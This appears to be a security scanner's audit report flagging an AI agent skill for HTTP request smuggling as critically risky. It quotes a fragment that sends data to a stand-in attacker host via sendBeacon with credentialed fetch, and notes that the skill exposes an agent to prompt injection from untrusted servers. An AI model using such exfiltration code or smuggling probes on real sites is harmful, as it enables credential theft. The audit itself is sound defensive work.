request-smuggling

Fail

Audited by Snyk on Apr 30, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This is a clearly offensive request-smuggling playbook: it contains explicit techniques and PoCs for hijacking other users' requests, cache poisoning, and client-side desync that enable credential theft and data exfiltration (e.g., fetch with credentials: 'include' and navigator.sendBeacon('https://attacker.com/log', ...)), plus header-obfuscation variants to evade defenses—indicating deliberate malicious use rather than mere benign testing guidance.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The SKILL.md and H2_SMUGGLING_VARIANTS.md explicitly instruct the agent to send probes to arbitrary target servers and read/interpret their HTTP responses (e.g., "Send H2 POST with content-length: 0 and smuggled prefix" and the detection steps), which means the agent will fetch and act on untrusted third‑party web content as part of its workflow.

Audit Metadata

Risk Level: CRITICAL
Analyzed: Apr 30, 2026, 12:02 PM
Issues: 2